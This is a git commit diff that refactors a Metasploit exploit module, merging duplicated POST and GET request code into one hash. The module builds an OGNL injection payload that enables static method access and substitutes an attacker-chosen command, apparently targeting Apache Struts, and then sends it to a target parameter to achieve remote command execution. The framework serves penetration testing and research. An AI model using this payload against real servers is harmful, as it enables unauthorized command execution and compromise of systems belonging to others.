converted request params to hash merge operation
parent
51879ab9c7
commit
47524a0570
|
@ -79,23 +79,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
|
||||
inject.gsub!(/CMD/,cmd)
|
||||
uri = normalize_uri(target_uri.path)
|
||||
req_hash = {'uri' => uri, 'version' => '1.1', 'method' => datastore['HTTPMETHOD'] }
|
||||
|
||||
case datastore['HTTPMETHOD']
|
||||
when 'POST'
|
||||
resp = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'vars_post' => { datastore['PARAMETER'] => inject },
|
||||
'version' => '1.1',
|
||||
'method' => 'POST'
|
||||
})
|
||||
req_hash.merge!({ 'vars_post' => { datastore['PARAMETER'] => inject }})
|
||||
when 'GET'
|
||||
resp = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'vars_get' => { datastore['PARAMETER'] => inject },
|
||||
'version' => '1.1',
|
||||
'method' => 'GET'
|
||||
})
|
||||
req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject }})
|
||||
end
|
||||
|
||||
# Display a nice "progress bar" instead of message spam
|
||||
case @notify_flag
|
||||
when 0
|
||||
|
@ -106,7 +98,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
when 2
|
||||
print_status("Payload upload complete")
|
||||
end
|
||||
return resp #Used for check function.
|
||||
|
||||
return send_request_cgi(req_hash) #Used for check function.
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
Loading…
Reference in New Issue